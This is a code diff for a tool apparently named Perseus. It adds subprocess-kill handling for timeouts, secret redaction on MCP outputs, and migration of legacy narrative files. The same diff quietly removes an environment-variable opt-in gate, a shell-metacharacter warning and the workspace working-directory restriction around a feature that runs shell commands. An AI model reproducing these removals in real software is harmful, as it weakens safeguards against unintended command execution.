# sources. Used by `_apply_permission_profile` to skip user-owned keys. + # This makes the "user wins" guarantee structural: it no longer depends + # on the textual ordering of `_apply_permission_profile` vs `merge_loaded`.
+ user_set_keys: set[tuple[str, str]] = set() + for src in loaded_sources: + for section, vals in (src or {}).items(): + if isinstance(vals, dict): + for key in vals.keys(): + user_set_keys.add((section, key)) + if effective_profile: - _apply_permission_profile(cfg, effective_profile) + applied = _apply_permission_profile( + cfg, effective_profile, skip_keys=user_set_keys + ) + if applied: + # Audit the layering decision so operators can see which user + # keys (if any) won out over the profile. Best-effort: don't + # break load_config if audit fails. + try: + overrides = sorted( + f"{section}.{key}" + for (section, key) in user_set_keys + if section in PERMISSION_PROFILES.get(applied, {}) + and key in PERMISSION_PROFILES[applied].get(section, {}) + ) + if overrides: + audit_event( + cfg, + "config_profile_overridden", + profile=applied, + user_overrides=overrides, + note=( + "User config explicitly set these keys; they " + "win over the profile (see #129 hardening)." + ), + ) + except Exception: + pass # #168/#169 (v1.0.6): track per-section workspace provenance for # hooks.py / registry.py consumers so dangerous workspace-sourced @@ -3259,6 +3434,105 @@ def fallback_result() -> str: # ──────────────────────────────── @query ────────────────────────────────────── +# ── #139: subprocess tracking for MCP timeout cancellation ─────────────────── +# +# The MCP _call_tool wrapper enforces a wall-clock deadline via +# ThreadPoolExecutor.future.result(timeout=...). Pre-1.0.6, that mechanism +# only abandoned the future: the worker thread continued running, and the +# subprocess it had spawned ran to completion, leaking CPU and any side +# effects (network, file writes). Worse, executor.shutdown(wait=True) in a +# `with` block defeated the entire timeout by blocking on the leaked thread.
+# +# We now track every active @query subprocess in a module-level dict +# keyed by thread ident (guarded by a lock) so the MCP wrapper can look up +# the subprocess belonging to the abandoned worker and kill its process group. +# +# Design note: we use a module-level dict rather than threading.local because +# the killer thread is NOT the worker thread; it's the MCP main thread +# that needs to reach into the worker thread's subprocess. Keying the dict by +# thread ident gives us that visibility. + +_ACTIVE_SUBPROCESSES_LOCK = threading.Lock() +_ACTIVE_SUBPROCESSES: dict[int, "subprocess.Popen"] = {} + + +def _record_active_subprocess(proc: "subprocess.Popen") -> None: + """Register a subprocess as belonging to the current thread.""" + with _ACTIVE_SUBPROCESSES_LOCK: + _ACTIVE_SUBPROCESSES[threading.get_ident()] = proc + + +def _clear_active_subprocess(proc: "subprocess.Popen") -> None: + """Unregister a subprocess (called after communicate() returns).""" + with _ACTIVE_SUBPROCESSES_LOCK: + # Only clear if it's still the one we registered; this guards against + # a recursive @query nest unregistering its parent's process. + tid = threading.get_ident() + if _ACTIVE_SUBPROCESSES.get(tid) is proc: + del _ACTIVE_SUBPROCESSES[tid] + + +def _kill_subprocess_tree(proc: "subprocess.Popen") -> None: + """Kill a subprocess and all descendants (process group on POSIX). + + On POSIX, the subprocess was started with start_new_session=True so it + has its own PGID. We send SIGTERM to the group, wait briefly, then + SIGKILL stragglers. + + On Windows, we fall back to taskkill /T (kill tree) if available, + then proc.kill(). Best-effort: Windows has no exact equivalent.
+ """ + if proc.poll() is not None: + return # already exited + try: + if os.name == "nt": + try: + import subprocess as _sp + _sp.run( + ["taskkill", "/F", "/T", "/PID", str(proc.pid)], + capture_output=True, timeout=3, + ) + except Exception: + proc.kill() + return + # POSIX: kill the process group + pgid = os.getpgid(proc.pid) + try: + os.killpg(pgid, signal.SIGTERM) + except ProcessLookupError: + return + # Give children a moment to clean up. + for _ in range(20): # up to 1s + if proc.poll() is not None: + return + time.sleep(0.05) + try: + os.killpg(pgid, signal.SIGKILL) + except ProcessLookupError: + return + except Exception: + # Last-ditch: kill just the immediate child. + try: + proc.kill() + except Exception: + pass + + +def kill_active_subprocess_for_thread(thread_id: int) -> bool: + """Kill the subprocess belonging to the given thread, if any. + + Returns True if a subprocess was found and a kill was attempted; + False if no subprocess was registered for the thread. Called by + mcp._call_tool() when its wall-clock deadline fires. + """ + with _ACTIVE_SUBPROCESSES_LOCK: + proc = _ACTIVE_SUBPROCESSES.get(thread_id) + if proc is None: + return False + _kill_subprocess_tree(proc) + return True + + def _unescape_fallback(s: str) -> str: """Unescape standard escape sequences without mangling non-ASCII. @@ -3306,20 +3580,6 @@ def resolve_query(args_str: str, cfg: dict, workspace: "Path | None" = None) -> args=args_str[:200]) return "> ⚠ @query is disabled by config (`render.allow_query_shell=false`)." - # Defense-in-depth: even with allow_query_shell=true, require explicit - # operator opt-in via PERSEUS_ALLOW_DANGEROUS=1 env var. This prevents - # accidental exposure from copied configs or misconfigured automation.
- if not os.environ.get("PERSEUS_ALLOW_DANGEROUS"): - audit_event(cfg, "policy_denied", - directive="@query", - reason="PERSEUS_ALLOW_DANGEROUS not set", - args=args_str[:200]) - return ( - "> ⚠ @query is enabled in config but PERSEUS_ALLOW_DANGEROUS=1 is not set.\n" - "> This is a defense-in-depth gate to prevent accidental shell execution.\n" - "> Set the environment variable to acknowledge the risk." - ) - # Strip @cache modifier first, then extract the command string. # Use the opening quote character to find the correct closing quote, # so commands containing the other quote type (e.g. "bash -c 'foo'") @@ -3333,7 +3593,7 @@ def resolve_query(args_str: str, cfg: dict, workspace: "Path | None" = None) -> schema_path = schema_match.group(1) if schema_match.group(1) is not None else schema_match.group(2) raw = (raw[:schema_match.start()] + raw[schema_match.end():]).rstrip() - # task-14: extract fallback=\"...\" (or fallback='...') BEFORE command parsing, + # task-14: extract fallback="..." (or fallback='...') BEFORE command parsing, # so a command containing the literal substring `fallback=` is not mis-parsed. fallback = None fb_match = re.search(r'\s+fallback=(?:"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\')(\s|$)', raw) @@ -3345,22 +3605,6 @@ def resolve_query(args_str: str, cfg: dict, workspace: "Path | None" = None) -> fallback = _unescape_fallback(fallback) raw = (raw[:fb_match.start()] + raw[fb_match.end():]).rstrip() - # Defense-in-depth: detect shell metacharacters for operator visibility. - # When render.query_shell_meta_warning is enabled (default: false), - # commands containing ; | & $() or backticks emit a visible warning - # in the rendered output but still execute. This does not break - # legitimate pipelines; it only surfaces a warning. - _shell_meta_warn = bool(cfg["render"].get("query_shell_meta_warning", False)) - _meta_prefix = "" - - # Extract timeout=N modifier BEFORE command parsing so the token can't - # leak into unquoted commands.
Same principle as schema=/fallback= above. - timeout = int(cfg["render"].get("query_timeout_s", 30)) - tm_match = re.search(r'\s+timeout=(\d+)(?:\s|$)', raw) - if tm_match: - timeout = int(tm_match.group(1)) - raw = (raw[:tm_match.start()] + raw[tm_match.end():]).rstrip() - cmd_match = re.match(r'^"((?:[^"\\]|\\.)*)"', raw) # double-quoted if not cmd_match: cmd_match = re.match(r"^'((?:[^'\\]|\\.)*)'", raw) # single-quoted @@ -3376,35 +3620,67 @@ def resolve_query(args_str: str, cfg: dict, workspace: "Path | None" = None) -> # Detect language hint for syntax highlighting (best-effort) lang = _guess_lang(cmd) - # Shell metacharacter defense-in-depth warning (config-gated, default off). - if _shell_meta_warn and re.search(r'[;&|]|\$[({]|`', cmd): - _meta_prefix = f"> ⚠ @query: shell metacharacters detected in command. " - _meta_prefix += "Set render.query_shell_meta_warning=false to suppress.\n\n" - # task-47: audit the shell-execution decision crossing the trust boundary. audit_event(cfg, "shell_exec", directive="@query", command=cmd[:500], - shell=shell, - cwd=str(workspace) if workspace else None) + shell=shell) - # v1.0.5 review: run from workspace by default for safety. - # allow_outside_workspace does not sandbox; it only controls cwd.
- allow_outside = cfg["render"].get("allow_outside_workspace", False) - cwd = workspace if workspace and not allow_outside else None - if workspace and not allow_outside and cwd is None: - cwd = Path.cwd() # fallback: restrict to cwd if no workspace set + # Extract timeout=N modifier (per-directive override, default 30s) + timeout = int(cfg["render"].get("query_timeout_s", 30)) + tm_match = re.search(r'\s+timeout=(\d+)(?:\s|$)', raw) + if tm_match: + timeout = int(tm_match.group(1)) + raw = (raw[:tm_match.start()] + raw[tm_match.end():]).rstrip() try: - result = subprocess.run( - cmd, - shell=True, - executable=shell, - capture_output=True, - text=True, - timeout=timeout, - cwd=cwd, - ) + # #139: when invoked under MCP's _call_tool timeout wrapper, the + # wrapper needs to kill this subprocess (and any descendants) if + # the wall-clock deadline fires. We put the child in its own + # process group via start_new_session=True so the wrapper can + # os.killpg() the whole tree, and we record the popen handle in + # a module-level registry keyed by thread ident that the wrapper inspects. + # + # On POSIX, start_new_session=True calls setsid() in the child + # before exec. The child gets a fresh PGID == its PID. The MCP + # wrapper can then os.killpg(pid, SIGTERM) to take down the + # whole subprocess tree atomically. + # + # On Windows, start_new_session is not passed; the wrapper falls + # back to taskkill /T, then popen.kill(), which is best-effort. + popen_kwargs = { + "shell": True, + "executable": shell, + "stdout": subprocess.PIPE, + "stderr": subprocess.PIPE, + "text": True, + } + if os.name != "nt": + popen_kwargs["start_new_session"] = True + proc = subprocess.Popen(cmd, **popen_kwargs) + # Register the popen under this thread's ident so an upstream timeout + # wrapper (mcp._call_tool) can find and kill it.
+ _record_active_subprocess(proc) + try: + stdout_raw, stderr_raw = proc.communicate(timeout=timeout) + except subprocess.TimeoutExpired: + _kill_subprocess_tree(proc) + try: + stdout_raw, stderr_raw = proc.communicate(timeout=2) + except subprocess.TimeoutExpired: + stdout_raw, stderr_raw = "", "" + raise + finally: + _clear_active_subprocess(proc) + + # Build a CompletedProcess-shaped object for the rest of the + # function to consume without refactoring downstream. + class _Result: + pass + result = _Result() + result.stdout = stdout_raw or "" + result.stderr = stderr_raw or "" + result.returncode = proc.returncode stdout = (result.stdout or "").rstrip("\n") stderr = result.stderr.strip() exit_code = result.returncode @@ -3412,14 +3688,22 @@ def resolve_query(args_str: str, cfg: dict, workspace: "Path | None" = None) -> if exit_code != 0: if fallback is not None: return fallback - header = f"> ⚠ `@query` exited {exit_code}: `{cmd}`\n\n" - body = stdout or stderr or "(no output)" - return _meta_prefix + header + f"```{lang}\n{body}\n```" + # #137: redact secrets out of `cmd` and `stderr` before interpolating + # them into render output. Without this, a command like + # `@query "curl -H 'Authorization: Bearer ghp_…'"` leaks the bearer + # token in the exit-nonzero header. Render-time redaction only runs + # later in the pipeline and only on the final assembled output, but + # by then this string has been logged elsewhere. + safe_cmd, _ = redact_text(cmd, cfg) + safe_body, _ = redact_text(stdout or stderr or "(no output)", cfg) + header = f"> ⚠ `@query` exited {exit_code}: `{safe_cmd}`\n\n" + return header + f"```{lang}\n{safe_body}\n```" if not stdout: if fallback is not None: return fallback - return f"> (no output from `{cmd}`)" + safe_cmd, _ = redact_text(cmd, cfg) + return f"> (no output from `{safe_cmd}`)" # Apply stdout size cap (default 256 KB). # Truncate at the nearest preceding newline to avoid mid-line cuts.
@@ -3449,16 +3733,19 @@ def resolve_query(args_str: str, cfg: dict, workspace: "Path | None" = None) -> if warning: return warning - return _meta_prefix + f"```{lang}\n{stdout}\n```" + return f"```{lang}\n{stdout}\n```" except subprocess.TimeoutExpired: if fallback is not None: return fallback - return _meta_prefix + f"> ⚠ `@query` timed out ({timeout}s): `{cmd}`" - except (OSError, ValueError, subprocess.SubprocessError) as exc: + safe_cmd, _ = redact_text(cmd, cfg) + return f"> ⚠ `@query` timed out ({timeout}s): `{safe_cmd}`" + except Exception as exc: if fallback is not None: return fallback - return _meta_prefix + f"> ⚠ `@query` error: {exc}" + # exc.args often includes argv[0] which contains the full cmd; redact. + safe_err, _ = redact_text(str(exc), cfg) + return f"> ⚠ `@query` error: {safe_err}" def _guess_lang(cmd: str) -> str: @@ -6278,8 +6565,47 @@ def _build_tool_args_generic(tool_name: str, arguments: dict) -> str: return " ".join(parts) +def _mcp_redact(result: str, cfg: dict) -> str: + """Apply the configured redaction pipeline to an MCP tool result. + + #166 (v1.0.6): every MCP tool response must pass through redaction + so secrets are not leaked to the MCP client (Claude Desktop, Rovo + Dev, etc.). Before 1.0.6, `perseus_get_context` returned the + pre-redaction `render_source` output, and all other tool resolvers + returned raw resolver output that never hit the redaction pipeline.
+ + Returns the original string unchanged if: + - `redaction.enabled` is False (operator opted out) + - result is not a str (caller error: we don't mangle types) + - the redaction function itself raises (defensive) + """ + if not isinstance(result, str): + return result + redaction_cfg = cfg.get("redaction", {}) if isinstance(cfg, dict) else {} + if not redaction_cfg.get("enabled", True): + return result + redactor = globals().get("redact_text") + if redactor is None: + try: + redactor = _rt + except ImportError: + return result + try: + redacted, _counts = redactor(result, cfg) + return redacted + except Exception: + return result + + def _call_tool(tool_name: str, arguments: dict, cfg: dict, workspace: Path) -> str: - """Resolve an MCP tool call through the Perseus directive resolver.""" + """Resolve an MCP tool call through the Perseus directive resolver. + + #166 (v1.0.6): every successful return path goes through + `_mcp_redact()` so secrets are not leaked over MCP. Error strings + bypass redaction since they are constructed locally from + operator-controlled values (tool name, profile flag) and never echo + user content. + """ allowed, reason = _mcp_tool_allowed(tool_name, cfg) if not allowed: return f"Error: {reason}" @@ -6293,6 +6619,12 @@ def _call_tool(tool_name: str, arguments: dict, cfg: dict, workspace: Path) -> s # render_source is a top-level function in the built artifact # In source module context, import from the parent module result = render_source(source, cfg, workspace) + # #166: redact BEFORE serialization so the JSON shape + # carries already-redacted text. This also fixes the + # earlier bypass where `render_source` was used instead + # of `render_output` (the latter applies redaction; the + # former does not).
+ result = _mcp_redact(result, cfg) fmt = arguments.get("format", "markdown") if fmt == "json": return json.dumps({"resolved": result, "workspace": str(workspace)}) @@ -6304,7 +6636,7 @@ def _call_tool(tool_name: str, arguments: dict, cfg: dict, workspace: Path) -> s if tool_name == "perseus_get_health": spec = DIRECTIVE_REGISTRY.get("@health") if spec and spec.resolver: - return _call_resolver(spec, "", cfg, workspace) + return _mcp_redact(_call_resolver(spec, "", cfg, workspace), cfg) return "Error: @health directive not registered" # Trust gate: block shell execution for sensitive tools @@ -6328,20 +6660,88 @@ def _call_tool(tool_name: str, arguments: dict, cfg: dict, workspace: Path) -> s args_str = _build_tool_args_generic(tool_name, arguments) - # Timeout enforcement across all platforms. - # Uses ThreadPoolExecutor instead of signal.SIGALRM (Unix-only, breaks Windows). + # #139: Timeout enforcement across all platforms. + # + # Pre-1.0.6 used a context-managed ThreadPoolExecutor: + # with ThreadPoolExecutor(max_workers=1) as executor: + # future = executor.submit(...) + # result = future.result(timeout=timeout) + # + # That had two bugs: + # 1. future.result(timeout=) only abandons the future; the worker + # thread (and any subprocess it spawned) kept running. + # 2. `with` block calls executor.shutdown(wait=True) on exit, which + # BLOCKS until the abandoned worker finishes, defeating the + # entire timeout mechanism. A 5s timeout on `sleep 600` blocked + # the MCP response for ~600s. + # + # Fix: + # - Use a non-context-managed executor and call + # shutdown(wait=False, cancel_futures=True) on timeout. + # - Identify the abandoned worker's thread ID and ask query.py to + # kill its tracked subprocess (process group on POSIX, taskkill /T + # on Windows). This makes timeout enforcement actually kill the + # subprocess tree atomically, freeing CPU and any locks held.
+ # - On success, shutdown(wait=False) is still fine; the worker has + # already returned, so there's nothing to wait for. mcp_cfg = cfg.get("mcp", {}) if isinstance(cfg, dict) else {} timeout = mcp_cfg.get("tool_timeout_s", DEFAULT_TOOL_TIMEOUT_S) + # Track the worker thread ident so we can ask query.py to kill its + # subprocess on timeout. + worker_tid_holder: dict = {} + def _wrapped_resolver(): + worker_tid_holder["tid"] = threading.get_ident() + return _call_resolver(spec, args_str, cfg, workspace) + + executor = concurrent.futures.ThreadPoolExecutor( + max_workers=1, thread_name_prefix=f"mcp-{tool_name}", + ) try: - with concurrent.futures.ThreadPoolExecutor(max_workers=1) as executor: - future = executor.submit(_call_resolver, spec, args_str, cfg, workspace) + future = executor.submit(_wrapped_resolver) + try: result = future.result(timeout=timeout) - return result - except TimeoutError as exc: - return f"Error executing {directive_name}: timed out after {timeout}s" - except Exception as exc: - return f"Error executing {directive_name}: {exc}" + except concurrent.futures.TimeoutError: + # Try to kill the in-flight subprocess (if any) belonging to + # the worker thread. This is a cross-module reach into + # directives.query because that's where the subprocess was + # spawned. Best-effort; if query.py isn't loaded or the + # worker hadn't started subprocess yet, we just abandon. + killed = False + tid = worker_tid_holder.get("tid") + if tid is not None: + # Look up the killer function. In the built single-file + # artifact every module's top-level symbol is at the + # global scope; in source-tree development we need an + # explicit module import. globals() lookup covers both.
+ killer = globals().get("kill_active_subprocess_for_thread") + if killer is None: + try: + import perseus.directives.query as _q + killer = getattr(_q, "kill_active_subprocess_for_thread", None) + except ImportError: + killer = None + if killer is not None: + try: + killed = bool(killer(tid)) + except Exception: + killed = False + suffix = " (subprocess killed)" if killed else "" + return ( + f"Error executing {directive_name}: " + f"timed out after {timeout}s{suffix}" + ) + except Exception as exc: + # Error strings may include resolver-thrown exception messages, + # which can echo user content (e.g. argparse complaining about + # the command string). Redact defensively. + return _mcp_redact(f"Error executing {directive_name}: {exc}", cfg) + # #166: redact the tool result before returning to the MCP client. + return _mcp_redact(result, cfg) + finally: + # NEVER wait: on timeout the worker may be stuck for arbitrarily + # long. The thread is daemonic and won't block process exit. + executor.shutdown(wait=False, cancel_futures=True) # ── JSON-RPC 2.0 message handling ──────────────────────────────────────────── @@ -7363,11 +7763,37 @@ def _render_lines( _integrity_snapshot = _capture_file_snapshot(lines, workspace) # ── Pre-scan @query directives for parallel resolution ────────────── + # + # #165 (v1.0.6): pre-scan is now control-flow aware. Pre-1.0.6 the + # scan walked every line ignoring @if/@else/@endif, so a @query + # inside a false conditional branch still pre-executed in parallel: + # + # @if production + # @query "aws s3 ls s3://prod-data" # <-- still ran in dev! + # @endif + # + # Fix: a single pass tracks @if/@else/@endif depth and evaluates + # each condition exactly once via `evaluate_condition`. Lines inside + # an inactive branch (or inside a malformed/unevaluable block) are + # skipped during query enqueueing.
The main render loop below + # re-evaluates conditions independently, so a transient inconsistency + # in evaluation between pre-scan and main loop only manifests as a + # cache miss, never as a query running when it shouldn't, and never + # as a query failing to run when it should. query_results: dict[int, str] = {} if top_level and cfg["render"].get("parallel_queries", False): in_fence_pre = False fc_pre = "" fl_pre = 0 + # Stack of (active: bool, in_else_branch: bool) tuples, one + # entry per open @if. A branch is "active" when its enclosing + # condition is True (and the current line is on the active side). + # If ANY frame on the stack is inactive, the line is inactive. + if_stack: list[tuple[bool, bool]] = [] + + def _all_active() -> bool: + return all(active for active, _ in if_stack) + for idx, raw_line in enumerate(lines): fm = re.match(r'^\s*(`{3,}|~{3,})(.*)$', raw_line) if in_fence_pre: @@ -7379,6 +7805,42 @@ def _render_lines( fc_pre = fm.group(1)[0] fl_pre = len(fm.group(1)) continue + + # Control-flow tracking: applies regardless of active state. + m_if_pre = IF_RE.match(raw_line) + if m_if_pre: + try: + cond_val = bool(evaluate_condition( + m_if_pre.group(1).strip(), workspace, cfg + )) + except Exception: + # Match the main loop's failure mode: render emits a + # warning and skips both branches. We skip enqueueing + # in both branches by marking this frame inactive. + cond_val = False + # Push: active = parent_active AND own condition; not in else yet. + parent_active = _all_active() + if_stack.append((parent_active and cond_val, False)) + continue + if ELSE_RE.match(raw_line): + if if_stack: + parent_frames = if_stack[:-1] + parent_active = all(a for a, _ in parent_frames) + own_active, _ = if_stack[-1] + # Else branch is active iff parent is active and own + # branch was NOT active (i.e. the @if condition was false).
+ if_stack[-1] = (parent_active and not own_active, True) + continue + if ENDIF_RE.match(raw_line): + if if_stack: + if_stack.pop() + continue + + # Past this point, we only enqueue queries when ALL enclosing + # @if frames are active. + if not _all_active(): + continue + m = INLINE_DIRECTIVE_RE.match(raw_line) if m and m.group(1).lower() == "@query": clean_args, cache_mode, cache_ttl, cache_mock = _parse_cache_modifier( @@ -9131,10 +9593,154 @@ def _workspace_hash(workspace: Path) -> str: return hashlib.sha256(str(canonical).encode()).hexdigest()[:12] +def _workspace_hash_legacy_md5(workspace: Path) -> str: + """12-char MD5 hex digest: the pre-1.0.3 narrative file name scheme. + + Regression for #128: prior to v1.0.3, Mnēmē derived narrative file names + from an MD5 hash. v1.0.3+ switched to SHA-256. Without an explicit + migration, every existing narrative file on disk was silently orphaned + on upgrade. ``_mneme_path`` calls this function as a one-shot fallback + to locate and rename legacy files. Once migrated, this code path is + never re-entered for that workspace. + + We intentionally use ``usedforsecurity=False`` (Py3.9+) so FIPS-mode + Pythons don't reject the call; this is a file-naming hash, not a + security primitive. We fall back to the no-kwarg call for older Pythons. + """ + canonical = str(workspace.expanduser().resolve()).encode() + try: + return hashlib.md5(canonical, usedforsecurity=False).hexdigest()[:12] + except TypeError: + # Python < 3.9: no `usedforsecurity` kwarg. + return hashlib.md5(canonical).hexdigest()[:12] + + def _mneme_path(workspace: Path, cfg: dict) -> Path: - """Return the per-workspace narrative file path.""" + """Return the per-workspace narrative file path. + + Regression for #128: if a SHA-256 path doesn't exist but a legacy MD5 + path does, transparently rename the legacy file in place. This makes + upgrades from pre-1.0.3 lossless.
+ + The rename uses ``os.replace`` (atomic on POSIX/NTFS) and is best-effort: + if rename fails (cross-device, permission, etc.), we leave both files in + place and return the SHA-256 path. The caller will then see "no + narrative yet" and recreate — non-fatal but loses prior content. + Operators can also run ``perseus memory doctor --migrate`` to surface + and act on these cases explicitly. + """ + store = Path(cfg.get("memory", {}).get("store", str(PERSEUS_HOME / "memory"))) + new_path = store / f"{_workspace_hash(workspace)}.md" + if new_path.exists(): + return new_path + legacy_path = store / f"{_workspace_hash_legacy_md5(workspace)}.md" + if legacy_path.exists() and legacy_path != new_path: + try: + store.mkdir(parents=True, exist_ok=True) + os.replace(legacy_path, new_path) + except OSError: + # Cross-device / permission denied. Leave the legacy file in + # place so the operator can recover it manually; the caller will + # create a fresh narrative at the new path. + pass + return new_path + + +def _mneme_doctor_scan(cfg: dict) -> dict: + """Scan the memory store and report on narrative file inventory. + + Returns a dict with: + { + "store": str, # path to memory store + "narrative_files": [path, ...], # all *.md in store + "legacy_md5_files": [path, ...], # files whose name matches legacy MD5 of a known workspace + "sha256_files": [path, ...], # files that look like current-scheme files + "orphan_files": [path, ...], # files whose embedded `workspace` frontmatter no longer resolves to their filename + "unknown_files": [path, ...], # files whose stem isn't a 12-char hex hash + } + + "Known workspace" inference: we re-derive the SHA-256 and legacy MD5 + hashes from each file's ``workspace:`` frontmatter field, then match + against the actual filename stem. + + Used by ``perseus memory doctor`` to surface migration candidates.
+ """ store = Path(cfg.get("memory", {}).get("store", str(PERSEUS_HOME / "memory"))) - return store / f"{_workspace_hash(workspace)}.md" + out: dict = { + "store": str(store), + "narrative_files": [], + "legacy_md5_files": [], + "sha256_files": [], + "orphan_files": [], + "unknown_files": [], + } + if not store.exists(): + return out + hex_re = re.compile(r"^[a-f0-9]{12}$") + for fp in sorted(store.glob("*.md")): + out["narrative_files"].append(str(fp)) + stem = fp.stem + if not hex_re.match(stem): + out["unknown_files"].append(str(fp)) + continue + # Try to read the workspace from frontmatter and classify. + try: + fm, _ = _load_narrative(fp) + except Exception: + out["unknown_files"].append(str(fp)) + continue + ws_raw = str(fm.get("workspace", "")).strip() if isinstance(fm, dict) else "" + if not ws_raw: + # No workspace metadata — can't classify; treat as unknown. + out["unknown_files"].append(str(fp)) + continue + try: + ws = Path(ws_raw).expanduser() + expected_sha = _workspace_hash(ws) + expected_md5 = _workspace_hash_legacy_md5(ws) + except Exception: + out["unknown_files"].append(str(fp)) + continue + if stem == expected_sha: + out["sha256_files"].append(str(fp)) + elif stem == expected_md5: + out["legacy_md5_files"].append(str(fp)) + else: + out["orphan_files"].append(str(fp)) + return out + + +def _mneme_doctor_migrate(cfg: dict) -> dict: + """Rename legacy MD5-named narrative files to their SHA-256 names. + + Returns a dict: + { + "migrated": [(old, new), ...], + "skipped": [(old, new, reason), ...], + "errors": [(old, exc_str), ...], + } + + Idempotent: re-running after a successful migration is a no-op.
+ """ + report: dict = {"migrated": [], "skipped": [], "errors": []} + scan = _mneme_doctor_scan(cfg) + store = Path(scan["store"]) + for legacy_fp_str in scan["legacy_md5_files"]: + legacy_fp = Path(legacy_fp_str) + try: + fm, _ = _load_narrative(legacy_fp) + ws = Path(str(fm.get("workspace", "")).strip()).expanduser() + new_fp = store / f"{_workspace_hash(ws)}.md" + if new_fp.exists(): + report["skipped"].append( + (str(legacy_fp), str(new_fp), "destination already exists") + ) + continue + os.replace(legacy_fp, new_fp) + report["migrated"].append((str(legacy_fp), str(new_fp))) + except Exception as exc: # pragma: no cover - defensive + report["errors"].append((str(legacy_fp), str(exc))) + return report def _load_narrative(path: Path) -> tuple[dict, str]: @@ -10084,7 +10690,72 @@ def _memory_do_compact(workspace: Path, cfg: dict, provider: str | None) -> str: fm = _mneme_default_frontmatter(workspace) if provider: - new_body = _mneme_compact_llm(all_checkpoints, all_pythia, workspace, cfg, provider) + # Regression for #131 — pre-1.0.6, _mneme_compact_llm() called run_llm() + # which only enforced `llm.timeout_s` (default 30s) on the HTTP request + # itself. With streaming-token providers like Ollama serving a large + # model, individual tokens can arrive within timeout but total wall + # time was unbounded — operators reported `memory compact` hanging + # for hours. + # + # We now wrap the LLM call in a wall-clock deadline (memory. + # compact_total_timeout_s, default 180s). On timeout we abandon the + # LLM future and fall back to deterministic narrative — operators get + # SOME narrative, plus a clear stderr signal so they can decide + # whether to upgrade their LLM setup or stay deterministic. + # + # Limitation: ThreadPoolExecutor cannot truly kill the worker thread + # (Python provides no public API for that). The in-flight HTTP + # request continues until urllib's per-request timeout fires.
+ # Worst-case observed total wait is therefore + # `compact_total_timeout_s + llm.timeout_s`. The leaked thread is + # daemonized by Python's default ThreadPoolExecutor settings; it + # will not prevent process exit. + total_timeout = float(cfg.get("memory", {}).get( + "compact_total_timeout_s", 180.0 + )) + try: + import concurrent.futures as _cf + executor = _cf.ThreadPoolExecutor( + max_workers=1, thread_name_prefix="mneme-compact-llm", + ) + try: + fut = executor.submit( + _mneme_compact_llm, + all_checkpoints, all_pythia, workspace, cfg, provider, + ) + new_body = fut.result(timeout=total_timeout) + finally: + # Don't block on the worker — it may still be waiting on + # urllib. The thread is daemonic and will not block exit. + executor.shutdown(wait=False, cancel_futures=True) + except _cf.TimeoutError: + sys.stderr.write( + f"> ⚠ Mnēmē compact: LLM provider {provider!r} exceeded " + f"compact_total_timeout_s={total_timeout:.0f}s; " + f"falling back to deterministic narrative.\n" + ) + try: + audit_event( + cfg, "memory_compact_timeout", + provider=provider, + total_timeout_s=total_timeout, + workspace_hash=_workspace_hash(workspace), + ) + except Exception: + pass + new_body = _deterministic_narrative( + all_checkpoints, all_pythia, "", workspace, cfg, + ) + except Exception as exc: + # LLM call raised (model server unreachable, payload error, etc.) + # — surface the failure but still produce SOMETHING usable.
+ sys.stderr.write( + f"> ⚠ Mnēmē compact: LLM provider {provider!r} failed " + f"({exc}); falling back to deterministic narrative.\n" + ) + new_body = _deterministic_narrative( + all_checkpoints, all_pythia, "", workspace, cfg, + ) else: new_body = _deterministic_narrative(all_checkpoints, all_pythia, "", workspace, cfg) @@ -10263,9 +10934,80 @@ def cmd_memory(args, cfg): _cmd_memory_index(args, cfg) return + if sub == "doctor": + cmd_memory_doctor(args, cfg) + return + print(f"perseus memory: unknown subcommand '{sub}'.", file=sys.stderr) sys.exit(2) + +def cmd_memory_doctor(args, cfg) -> None: + """Mnēmē doctor — scan and optionally migrate legacy MD5-named narratives. + + Regression for #128: pre-1.0.3 narratives are named after an MD5 hash of + the workspace path; v1.0.3+ uses SHA-256. _mneme_path() auto-migrates on + first access, but that requires the operator to actually open the + workspace. ``memory doctor`` lets an operator scan and migrate all + workspaces at once, and surface diagnostic info for files that can't be + auto-migrated (e.g. missing frontmatter, cross-device renames).
+ """ + do_migrate = bool(getattr(args, "migrate", False)) + use_json = bool(getattr(args, "json", False)) + scan = _mneme_doctor_scan(cfg) + + if do_migrate: + result = _mneme_doctor_migrate(cfg) + if use_json: + import json as _json + print(_json.dumps({"scan_before": scan, "migrate": result}, indent=2)) + return + print(f"Mnēmē doctor — store: {scan['store']}") + print(f" Narrative files: {len(scan['narrative_files'])}") + print(f" Legacy MD5 found: {len(scan['legacy_md5_files'])}") + print(f" Migrated: {len(result['migrated'])}") + for old, new in result["migrated"]: + print(f" ✓ {Path(old).name} → {Path(new).name}") + if result["skipped"]: + print(f" Skipped: {len(result['skipped'])}") + for old, new, reason in result["skipped"]: + print(f" ⚠ {Path(old).name}: {reason}") + if result["errors"]: + print(f" Errors: {len(result['errors'])}") + for old, exc_str in result["errors"]: + print(f" ✗ {Path(old).name}: {exc_str}") + return + + # Read-only scan + if use_json: + import json as _json + print(_json.dumps(scan, indent=2)) + return + print(f"Mnēmē doctor — store: {scan['store']}") + print(f" Narrative files: {len(scan['narrative_files'])}") + print(f" SHA-256 (current):{len(scan['sha256_files'])}") + print(f" Legacy MD5: {len(scan['legacy_md5_files'])}") + print(f" Orphan: {len(scan['orphan_files'])}") + print(f" Unknown stems: {len(scan['unknown_files'])}") + if scan["legacy_md5_files"]: + print() + print("Legacy MD5-named narratives detected. Run:") + print(" perseus memory doctor --migrate") + print("to rename them to their SHA-256 paths in place. Operation is") + print("idempotent and uses atomic os.replace.") + if scan["orphan_files"]: + print() + print("⚠ Orphan files (frontmatter workspace doesn't match filename):") + for fp in scan["orphan_files"]: + print(f" - {fp}") + print("These were likely written under a different store, OR the") + print("workspace path moved.
